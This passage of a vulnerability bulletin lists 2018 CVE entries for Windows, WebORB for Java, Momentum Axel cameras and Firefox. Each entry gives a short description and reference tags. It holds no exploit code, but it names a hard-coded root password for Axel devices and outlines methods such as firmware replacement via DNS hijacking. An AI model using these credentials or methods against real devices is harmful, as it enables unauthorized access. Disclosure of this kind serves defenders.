A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session, aka "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability." This affects Windows Server 2016, Windows 10. This CVE ID is unique from CVE-2018-8201, CVE-2018-8211, CVE-2018-8212, CVE-2018-8215, CVE-2018-8216, CVE-2018-8221.
2018-06-14
not yet calculated
CVE-2018-8217
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A remote code execution vulnerability exists in Windows Domain Name System (DNS) DNSAPI.dll when it fails to properly handle DNS responses, aka "Windows DNSAPI Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
2018-06-14
not yet calculated
CVE-2018-8225
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A denial of service vulnerability exists when Microsoft Hyper-V Network Switch on a host server fails to properly validate input from a privileged user on a guest operating system, aka "Windows Hyper-V Denial of Service Vulnerability." This affects Windows 10, Windows 10 Servers.
2018-06-14
not yet calculated
CVE-2018-8218
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session, aka "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8201, CVE-2018-8211, CVE-2018-8212, CVE-2018-8215, CVE-2018-8216, CVE-2018-8217.
2018-06-14
not yet calculated
CVE-2018-8221
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A denial of service vulnerability exists when Windows NT WEBDAV Minirdr attempts to query a WEBDAV directory, aka "WEBDAV Denial of Service Vulnerability." This affects Windows 10 Servers, Windows 10.
2018-06-14
not yet calculated
CVE-2018-8175
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A remote code execution vulnerability exists when Windows improperly handles objects in memory, aka "Windows Remote Code Execution Vulnerability." This affects Windows Server 2012 R2, Windows RT 8.1, Windows Server 2012, Windows Server 2016, Windows 8.1, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8213.
2018-06-14
not yet calculated
CVE-2018-8210
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An Elevation of Privilege vulnerability exists when Cortana retrieves data from user input services without consideration for status, aka "Cortana Elevation of Privilege Vulnerability." This affects Windows 10 Servers, Windows 10.
2018-06-14
not yet calculated
CVE-2018-8140
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An elevation of privilege vulnerability exists in Windows when Desktop Bridge does not properly manage the virtual registry, aka "Windows Desktop Bridge Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8208.
2018-06-14
not yet calculated
CVE-2018-8214
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory, aka "Windows Kernel Information Disclosure Vulnerability." This affects Windows 10 Servers, Windows 10. This CVE ID is unique from CVE-2018-8207.
2018-06-14
not yet calculated
CVE-2018-8121
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A denial of service vulnerability exists when Windows improperly handles objects in memory, aka "Windows Denial of Service Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
2018-06-14
not yet calculated
CVE-2018-8205
BID
SECTRACK
CONFIRM
midnight_coders -- weborb_for_java
 
The Java implementations of AMF3 deserializers in WebORB for Java by Midnight Coders, version 5.1.1.0, derive class instances from java.io.Externalizable rather than the AMF3 specification's recommendation of flash.utils.IExternalizable. A remote attacker with the ability to spoof or control an RMI server connection may be able to send serialized Java objects that execute arbitrary code when deserialized.
2018-06-11
not yet calculated
CVE-2017-3207
BID
MISC
MISC
CERT-VN
midnight_coders -- weborb_for_java
 
The Java implementation of AMF3 deserializers used by WebORB for Java by Midnight Coders, version 5.1.1.0, allows external entity references (XXEs) from XML documents embedded within AMF3 messages. If the XML parsing is handled incorrectly, it could potentially lead to exposure of sensitive data on the server, denial of service, or server-side request forgery.
2018-06-11
not yet calculated
CVE-2017-3208
BID
MISC
MISC
CERT-VN
momentum -- axel
 
An issue was discovered on Momentum Axel 720P 5.1.8 devices. There is Authenticated Custom Firmware Upgrade via DNS Hijacking. An authenticated root user with CLI access is able to remotely upgrade firmware to a custom image due to lack of SSL validation by changing the nameservers in /etc/resolv.conf to the attacker's server, and serving the expected HTTPS response containing new firmware for the device to download.
2018-06-12
not yet calculated
CVE-2018-12257
MISC
momentum -- axel
 
An issue was discovered on Momentum Axel 720P 5.1.8 devices. Root access can be obtained via UART pins without any restrictions, which leads to full system compromise.
2018-06-12
not yet calculated
CVE-2018-12259
MISC
momentum -- axel
 
An issue was discovered on Momentum Axel 720P 5.1.8 devices. A password of EHLGVG is hard-coded for the root and admin accounts, which makes it easier for physically proximate attackers to log in at the console.
2018-06-13
not yet calculated
CVE-2018-12323
MISC
momentum -- axel
 
An issue was discovered on Momentum Axel 720P 5.1.8 devices. The root password can be obtained in cleartext by issuing the command 'showKey' from the root CLI. This password may be the same on all devices.
2018-06-12
not yet calculated
CVE-2018-12260
MISC
momentum -- axel
 
An issue was discovered on Momentum Axel 720P 5.1.8 devices. Custom Firmware Upgrade is possible via an SD Card. With physical access, an attacker can upgrade the firmware in under 60 seconds by inserting an SD card containing the firmware with name 'ezviz.dav' and rebooting.
2018-06-12
not yet calculated
CVE-2018-12258
MISC
momentum -- axel
 
An issue was discovered on Momentum Axel 720P 5.1.8 devices. All processes run as root.
2018-06-12
not yet calculated
CVE-2018-12261
MISC
mozilla -- firefox
The screenshot images displayed in the Activity Stream page, shown when a new tab is opened, are created from the meta tags of websites. An issue was discovered where the page could attempt to create these images through "file:" URLs from the local file system. This loading is blocked by the sandbox but could expose local data if combined with another attack that escapes sandbox protections. This vulnerability affects Firefox < 58.
2018-06-11
not yet calculated
CVE-2018-5118
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
A legacy extension's non-contentaccessible, defined resources can be loaded by an arbitrary web page through script. This script does this by using a maliciously crafted path string to reference the resources. Note: this vulnerability does not affect WebExtensions. This vulnerability affects Firefox < 59.
2018-06-11
not yet calculated
CVE-2018-5137
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
Memory safety bugs were reported in Firefox 54. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7780
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
Android intent URLs given to Firefox for Android can be used to navigate from HTTP or HTTPS URLs to local "file:" URLs, allowing for the reading of local data through a violation of same-origin policy. Note: This attack only affects Firefox for Android. Other operating systems are not affected. This vulnerability affects Firefox < 54.
2018-06-11
not yet calculated
CVE-2017-7759
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
On Windows systems, the logger run by the Windows updater deletes the file "update.log" before it runs in order to write a new log of that name. The path to this file is supplied at the command line to the updater and could be used in concert with another local exploit to delete a different file named "update.log" instead of the one intended. Note: This attack only affects Windows operating systems. Other operating systems are not affected. This vulnerability affects Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7796
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
In 32-bit versions of Firefox, the Adobe Flash plugin setting for "Enable Adobe Flash protected mode" is unchecked by default even though the Adobe Flash sandbox is actually enabled. The displayed state is the reverse of the true setting, resulting in user confusion. This could cause users to select this setting intending to activate it and inadvertently turn protections off. This vulnerability affects Firefox < 60.
2018-06-11
not yet calculated
CVE-2018-5165
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
Canvas allows the use of the "feDisplacementMap" filter on images loaded cross-origin. The rendering by the filter is variable depending on the input pixel, allowing for timing attacks when the images are loaded from third party locations. This vulnerability affects Firefox < 50.
2018-06-11
not yet calculated
CVE-2016-9077
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
Android intents can be used to launch Firefox for Android in reader mode with a user specified URL. This allows an attacker to spoof the contents of the addressbar as displayed to users. Note: This attack only affects Firefox for Android. Other operating systems are not affected. This vulnerability affects Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5463
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
On pages containing an iframe, the "data:" protocol can be used to create a modal dialog through JavaScript that will have an arbitrary domain as the dialog's location, spoofing the origin of the modal dialog from the user view. Note: This attack only affects installations with e10s multiprocess turned off. Installations with e10s turned on do not support the modal dialog functionality. This vulnerability affects Firefox < 56.
2018-06-11
not yet calculated
CVE-2017-7815
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
Proxy Auto-Config (PAC) files can specify a JavaScript function called for all URL requests with the full URL path which exposes more information than would be sent to the proxy itself in the case of HTTPS. Normally the Proxy Auto-Config file is specified by the user or machine owner and presumed to be non-malicious, but if a user has enabled Web Proxy Auto Detect (WPAD) this file can be served remotely. This vulnerability affects Firefox < 51.
2018-06-11
not yet calculated
CVE-2017-5384
BID
SECTRACK
CONFIRM
MISC
CONFIRM
mozilla -- firefox
A spoofing vulnerability can occur when a page switches to fullscreen mode without user notification, allowing a fake address bar to be displayed. This allows an attacker to spoof which page is actually loaded and in use. Note: This attack only affects Firefox for Android. Other operating systems are not affected. This vulnerability affects Firefox < 56.
2018-06-11
not yet calculated
CVE-2017-7817
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
On Linux systems, if the content process is compromised, the sandbox broker will allow files to be truncated even though the sandbox explicitly only has read access to the local file system and no write permissions. Note: This attack only affects the Linux operating system. Other operating systems are not affected. This vulnerability affects Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7794
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
Weak proxy objects have weak references on multiple threads when they should only have them on one, resulting in incorrect memory usage and corruption, which leads to potentially exploitable crashes. Note: This issue only affects Firefox for Android. Other operating systems are not affected. This vulnerability affects Firefox < 51.
2018-06-11
not yet calculated
CVE-2017-5392
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
A potentially exploitable use-after-free crash during actor destruction with service workers. This issue does not affect releases earlier than Firefox 49. This vulnerability affects Firefox < 49.0.2.
2018-06-11
not yet calculated
CVE-2016-5287
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
Mozilla's add-ons SDK had a world-accessible resource with an HTML injection vulnerability. If an additional vulnerability allowed this resource to be loaded as a document it could allow injecting content and script into an add-on's context. This vulnerability affects Firefox < 50.1.
2018-06-11
not yet calculated
CVE-2016-9903
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
WebExtensions can bypass security checks to load privileged URLs and potentially escape the WebExtension sandbox. This vulnerability affects Firefox < 50.
2018-06-11
not yet calculated
CVE-2016-9073
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
Malicious sites can display a spoofed location bar on a subsequently loaded page when the existing location bar on the new page is scrolled out of view if navigations between pages can be timed correctly. Note: This issue only affects Firefox for Android. Other operating systems are not affected. This vulnerability affects Firefox < 51.
2018-06-11
not yet calculated
CVE-2017-5395
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
The "browser.identity.launchWebAuthFlow" function of WebExtensions is only allowed to load content over "https:" but this requirement was not properly enforced. This can potentially allow privileged pages to be loaded by the extension. This vulnerability affects Firefox < 58.
2018-06-11
not yet calculated
CVE-2018-5113
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
The cache directory on the local file system is set to be world writable. Firefox defaults to extracting libraries from this cache. This allows for the possibility of an installed malicious application or tools with write access to the file system to replace files used by Firefox with their own versions. This vulnerability affects Firefox < 51.0.3.
2018-06-11
not yet calculated
CVE-2017-5397
BID
CONFIRM
CONFIRM
mozilla -- firefox
WebRTC can use a "WrappedI420Buffer" pixel buffer but the owning image object can be freed while it is still in use. This can result in the WebRTC encoder using uninitialized memory, leading to a potentially exploitable crash. This vulnerability affects Firefox < 60.
2018-06-11
not yet calculated
CVE-2018-5160
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
Malicious sites can display a spoofed addressbar on a page when the existing location bar on the new page is scrolled out of view if an HTML editable page element is user selected. Note: This attack only affects Firefox for Android. Other operating systems are not affected. This vulnerability affects Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5452
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
The filename appearing in the "Downloads" panel improperly renders some Unicode characters, allowing for the file name to be spoofed. This can be used to obscure the file extension of potentially executable files from user view in the panel. Note: the dialog to open the file will show the full, correct filename and whether it is executable or not. This vulnerability affects Firefox < 60.
2018-06-11
not yet calculated
CVE-2018-5173
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
A vulnerability exists in XSLT during number formatting where a negative buffer size may be allocated in some instances, leading to a buffer overflow and crash if it occurs. This vulnerability affects Firefox < 60.
2018-06-11
not yet calculated
CVE-2018-5177
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
Private browsing mode leaves metadata information, such as URLs, for sites visited in "browser.db" and "browser.db-wal" files within the Firefox profile after the mode is exited. Note: This issue only affects Firefox for Android. Other versions and operating systems are unaffected. This vulnerability affects Firefox < 50.
2018-06-11
not yet calculated
CVE-2016-9062
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
A use-after-free vulnerability can occur during WebGL operations. While this results in a potentially exploitable crash, the vulnerability is limited because the memory is freed and reused in a brief window of time during the freeing of the same callstack. This vulnerability affects Firefox < 60.
2018-06-11
not yet calculated
CVE-2018-5180
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
A content security policy (CSP) "frame-ancestors" directive containing origins with paths allows for comparisons against those paths instead of the origin. This results in a cross-origin information leak of this path information. This vulnerability affects Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7808
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
The "pingsender" executable used by the Firefox Health Report dynamically loads a system copy of libcurl, which an attacker could replace. This allows for privilege escalation as the replaced libcurl code will run with Firefox's privileges. Note: This attack requires an attacker have local system access and only affects OS X and Linux. Windows systems are not affected. This vulnerability affects Firefox < 57.
2018-06-11
not yet calculated
CVE-2017-7836
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
WebExtensions can bypass normal restrictions in some circumstances and use "browser.tabs.executeScript" to inject scripts into contexts where this should not be allowed, such as pages from other WebExtensions or unprivileged "about:" pages. This vulnerability affects Firefox < 59.
2018-06-11
not yet calculated
CVE-2018-5135
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
If cursor visibility is toggled by script from 'none' to an image and back, the cursor will be rendered temporarily invisible within Firefox. Note: This vulnerability only affects OS X. Other operating systems are not affected. This vulnerability affects Firefox < 58.
2018-06-11
not yet calculated
CVE-2018-5110
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
The JSON Viewer displays clickable hyperlinks for strings that are parseable as URLs, including "javascript:" links. If a JSON file contains malicious JavaScript embedded as "javascript:" links, users may be tricked into clicking and running this code in the context of the JSON Viewer. This can allow for the theft of cookies and authorization tokens which are accessible to that context. This vulnerability affects Firefox < 60.
2018-06-11
not yet calculated
CVE-2018-5176
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
Memory safety bugs were reported in Firefox 53. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 54.
2018-06-11
not yet calculated
CVE-2017-5471
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
A heap buffer overflow vulnerability may occur in WebAssembly when "shrinkElements" is called followed by garbage collection on memory that is now uninitialized. This results in a potentially exploitable crash. This vulnerability affects Firefox < 58.
2018-06-11
not yet calculated
CVE-2018-5094
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
Special "about:" pages used by web content, such as RSS feeds, can load privileged "about:" pages in an iframe. If a content-injection bug were found in one of those pages this could allow for potential privilege escalation. This vulnerability affects Firefox < 51.
2018-06-11
not yet calculated
CVE-2017-5391
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
A combination of an external SVG image referenced on a page and the coloring of anchor links stored within this image can be used to determine which pages a user has in their history. This can allow a malicious website to query user history. Note: This issue only affects Firefox 57. Earlier releases are not affected. This vulnerability affects Firefox < 57.0.1.
2018-06-11
not yet calculated
CVE-2017-7844
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
When a new tab is loaded through JavaScript events and fullscreen mode is then entered, the addressbar will not be rendered. This would allow a malicious site to display a spoofed addressbar, showing the location of an arbitrary website instead of the one loaded. Note: this issue only affects Firefox for Android. Desktop Firefox is unaffected. This vulnerability affects Firefox < 54.
2018-06-11
not yet calculated
CVE-2017-7770
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
If a server sends two Strict-Transport-Security (STS) headers for a single connection, they will be rejected as invalid and HTTP Strict Transport Security (HSTS) will not be enabled for the connection. This vulnerability affects Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7789
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
When an "iframe" has a "sandbox" attribute and its content is specified using "srcdoc", that content does not inherit the containing page's Content Security Policy (CSP) as it should unless the sandbox attribute included "allow-same-origin". This vulnerability affects Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7788
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
If an existing cookie is changed to be "HttpOnly" while a document is open, the original value remains accessible through script until that document is closed. Network requests correctly use the changed HttpOnly cookie. This vulnerability affects Firefox < 58.
2018-06-11
not yet calculated
CVE-2018-5114
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
Redirection from an HTTP connection to a "data:" URL assigns the referring site's origin to the "data:" URL in some circumstances. This can result in same-origin violations against a domain if it loads resources from malicious sites. Cross-origin setting of cookies has been demonstrated without the ability to read them. Note: This issue only affects Firefox 49 and 50. This vulnerability affects Firefox < 50.0.1.
2018-06-11
not yet calculated
CVE-2016-9078
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
If a URL using the "file:" protocol is dragged and dropped onto an open tab that is running in a different child process the tab will open a local file corresponding to the dropped URL, contrary to policy. One way to make the target tab open more reliably in a separate process is to open it with the "noopener" keyword. This vulnerability affects Firefox < 60.
2018-06-11
not yet calculated
CVE-2018-5181
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
Some Arabic and Indic vowel marker characters can be combined with Latin characters in a domain name to eclipse the non-Latin character with some font sets on the addressbar. The non-Latin character will not be visible to most viewers. This allows for domain spoofing attacks because these combined domain names do not display as punycode. This vulnerability affects Firefox < 57.
2018-06-11
not yet calculated
CVE-2017-7833
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
Memory safety bugs were reported in Firefox 55. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 56.
2018-06-11
not yet calculated
CVE-2017-7811
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
WebExtensions can bypass user prompts to first save and then open an arbitrarily downloaded file. This can result in an executable file running with local user privileges without explicit user consent. This vulnerability affects Firefox < 58.
2018-06-11
not yet calculated
CVE-2018-5105
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
If websocket data is sent with mixed text and binary in a single message, the binary data can be corrupted. This can result in an out-of-bounds read with the read memory sent to the originating server in response. This vulnerability affects Firefox < 60.
2018-06-11
not yet calculated
CVE-2018-5153
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox_and_firefox_esr
The Pocket toolbar button, once activated, listens for events fired from its own pages but does not verify the origin of incoming events. This allows content from other origins to fire events and inject content and commands into the Pocket context. Note: this issue does not affect users with e10s enabled. This vulnerability affects Firefox ESR < 45.6 and Firefox < 50.1.
2018-06-11
not yet calculated
CVE-2016-9902
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
CONFIRM
CONFIRM

mozilla -- firefox_and_firefox_esr
A use-after-free vulnerability can occur in the compositor during certain graphics operations when a raw pointer is used instead of a reference counted one. This results in a potentially exploitable crash. This vulnerability affects Firefox ESR < 52.7.3 and Firefox < 59.0.2.
2018-06-11
not yet calculated
CVE-2018-5148
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
mozilla -- firefox_and_firefox_esr
HTML tags received from the Pocket server will be processed without sanitization and any JavaScript code executed will be run in the "about:pocket-saved" (unprivileged) page, giving it access to Pocket's messaging API through HTML injection. This vulnerability affects Firefox ESR < 45.6 and Firefox < 50.1.
2018-06-11
not yet calculated
CVE-2016-9901
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
WebExtension scripts can use the "data:" protocol to affect pages loaded by other web extensions using this protocol, leading to potential data disclosure or privilege escalation in affected extensions. This vulnerability affects Firefox ESR < 45.7 and Firefox < 51.
2018-06-11
not yet calculated
CVE-2017-5386
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
A mechanism exists to bypass file system access protections in the sandbox using the file system request constructor through an IPC message. This allows for read and write access to the local file system. This vulnerability affects Firefox ESR < 52.1 and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5456
BID
SECTRACK
REDHAT
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
The Developer Tools feature suffers from a XUL injection vulnerability due to improper sanitization of the web page source code. In the worst case, this could allow arbitrary code execution when opening a malicious page with the style editor tool. This vulnerability affects Firefox ESR < 52.3 and Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7798
BID
SECTRACK
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
A use-after-free vulnerability can occur during WebRTC connections when interacting with the DTMF timers. This results in a potentially exploitable crash. This vulnerability affects Firefox ESR < 52.6 and Firefox < 58.
2018-06-11
not yet calculated
CVE-2018-5091
BID
SECTRACK
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
When Private Browsing mode is used, it is possible for a web worker to write persistent data to IndexedDB and fingerprint a user uniquely. IndexedDB should not be available in Private Browsing mode and this stored data will persist across multiple private browsing mode sessions because it is not cleared when exiting. This vulnerability affects Firefox ESR < 52.5.2 and Firefox < 57.0.1.
2018-06-11
not yet calculated
CVE-2017-7843
BID
BID
SECTRACK
REDHAT
CONFIRM
MLIST
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The libtremor library has the same flaw as CVE-2018-5146. This library is used by Firefox in place of libvorbis on Android and ARM platforms. This vulnerability affects Firefox ESR < 52.7.2 and Firefox < 59.0.1.
2018-06-11
not yet calculated
CVE-2018-5147
BID
SECTRACK
CONFIRM
MLIST
MLIST
DEBIAN
DEBIAN
CONFIRM
mozilla -- firefox_and_firefox_esr
 
An attack using manipulation of "updater.ini" contents, used by the Mozilla Windows Updater, and privilege escalation through the Mozilla Maintenance Service can allow for arbitrary file execution and deletion by the Maintenance Service, which has privileged access. Note: This attack requires local system access and only affects Windows. Other operating systems are not affected. This vulnerability affects Firefox ESR < 52.2 and Firefox < 54.
2018-06-11
not yet calculated
CVE-2017-7766
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The Mozilla Maintenance Service can be invoked by an unprivileged user to overwrite arbitrary files with junk data using the Mozilla Windows Updater, which runs with the Maintenance Service's privileged access. Note: This attack requires local system access and only affects Windows. Other operating systems are not affected. This vulnerability affects Firefox ESR < 52.2 and Firefox < 54.
2018-06-11
not yet calculated
CVE-2017-7767
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
Under certain circumstances the "fetch()" API can return transient local copies of resources that were sent with a "no-store" or "no-cache" cache header instead of downloading a copy from the network as it should. This can result in previously stored, locally cached data of a website being accessible to users if they share a common profile while browsing. This vulnerability affects Firefox ESR < 52.7 and Firefox < 59.
2018-06-11 | not yet calculated | CVE-2018-5131
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
When the Mozilla Updater is run, if the Updater's log file in the working directory points to a hardlink, data can be appended to an arbitrary local file. This vulnerability requires local system access. Note: this issue only affects Windows operating systems. This vulnerability affects Firefox ESR < 45.5 and Firefox < 50.
2018-06-11 | not yet calculated | CVE-2016-5293
BID
SECTRACK
CONFIRM
GENTOO
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
Same-origin protections for the PDF viewer can be bypassed, allowing a malicious site to intercept messages meant for the viewer. This could allow the site to retrieve PDF files restricted to viewing by an authenticated user on a third-party website. This vulnerability affects Firefox ESR < 52.8 and Firefox < 60.
2018-06-11 | not yet calculated | CVE-2018-5157
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
Add-on updates failed to verify that the add-on ID inside the signed package matched the ID of the add-on being updated. An attacker who could perform a man-in-the-middle attack on the user's connection to the update server and defeat the certificate pinning protection could provide a malicious signed add-on instead of a valid update. This vulnerability affects Firefox ESR < 45.5 and Firefox < 50.
2018-06-11 | not yet calculated | CVE-2016-9064
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The Mozilla Maintenance Service can be invoked by an unprivileged user to read 32 bytes of any arbitrary file on the local system by convincing the service that it is reading a status file provided by the Mozilla Windows Updater. The Mozilla Maintenance Service executes with privileged access, bypassing system protections against unprivileged users. Note: This attack requires local system access and only affects Windows. Other operating systems are not affected. This vulnerability affects Firefox ESR < 52.2 and Firefox < 54.
2018-06-11 | not yet calculated | CVE-2017-7768
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The internal feed reader APIs that crossed the sandbox barrier allowed for a sandbox escape and escalation of privilege if combined with another vulnerability that resulted in remote code execution inside the sandboxed process. This vulnerability affects Firefox ESR < 52.1 and Firefox < 53.
2018-06-11 | not yet calculated | CVE-2017-5455
BID
SECTRACK
REDHAT
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
An integer overflow in "createImageBitmap()" was reported through the Pwn2Own contest. The fix for this vulnerability disables the experimental extensions to the "createImageBitmap" API. This function runs in the content sandbox, requiring a second vulnerability to compromise a user's computer. This vulnerability affects Firefox ESR < 52.0.1 and Firefox < 52.0.1.
2018-06-11 | not yet calculated | CVE-2017-5428
REDHAT
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The Mozilla Windows updater modifies some files to be updated by reading the original file and applying changes to it. The location of the original file can be altered by a malicious user by passing a special path to the callback parameter through the Mozilla Maintenance Service, allowing the manipulation of files in the installation directory and privilege escalation by manipulating the Mozilla Maintenance Service, which has privileged access. Note: This attack requires local system access and only affects Windows. Other operating systems are not affected. This vulnerability affects Firefox ESR < 52.2 and Firefox < 54.
2018-06-11 | not yet calculated | CVE-2017-7760
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The Mozilla Maintenance Service "helper.exe" application creates a temporary directory writable by non-privileged users. When this is combined with creation of a junction (a form of symbolic link), protected files in the target directory of the junction can be deleted by the Mozilla Maintenance Service, which has privileged access. Note: This attack requires local system access and only affects Windows. Other operating systems are not affected. This vulnerability affects Firefox ESR < 52.2 and Firefox < 54.
2018-06-11 | not yet calculated | CVE-2017-7761
BID
SECTRACK
CONFIRM
MISC
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
An out-of-bounds write in "ClearKeyDecryptor" while decrypting some Clearkey-encrypted media content. The "ClearKeyDecryptor" code runs within the Gecko Media Plugin (GMP) sandbox. If a second mechanism is found to escape the sandbox, this vulnerability allows for the writing of arbitrary data within memory, resulting in a potentially exploitable crash. This vulnerability affects Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11 | not yet calculated | CVE-2017-5448
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The Mozilla Windows updater can be called by a non-privileged user to delete an arbitrary local file by passing a special path to the callback parameter through the Mozilla Maintenance Service, which has privileged access. Note: This attack requires local system access and only affects Windows. Other operating systems are not affected. This vulnerability affects Firefox ESR < 45.8 and Firefox < 52.
2018-06-11 | not yet calculated | CVE-2017-5409
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
The PDF viewer does not sufficiently sanitize PostScript calculator functions, allowing malicious JavaScript to be injected through a crafted PDF file. This JavaScript can then be run with the permissions of the PDF viewer by its worker. This vulnerability affects Firefox ESR < 52.8 and Firefox < 60.
2018-06-11 | not yet calculated | CVE-2018-5158
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
CONFIRM
mozilla -- firefox_and_firefox_esr
 
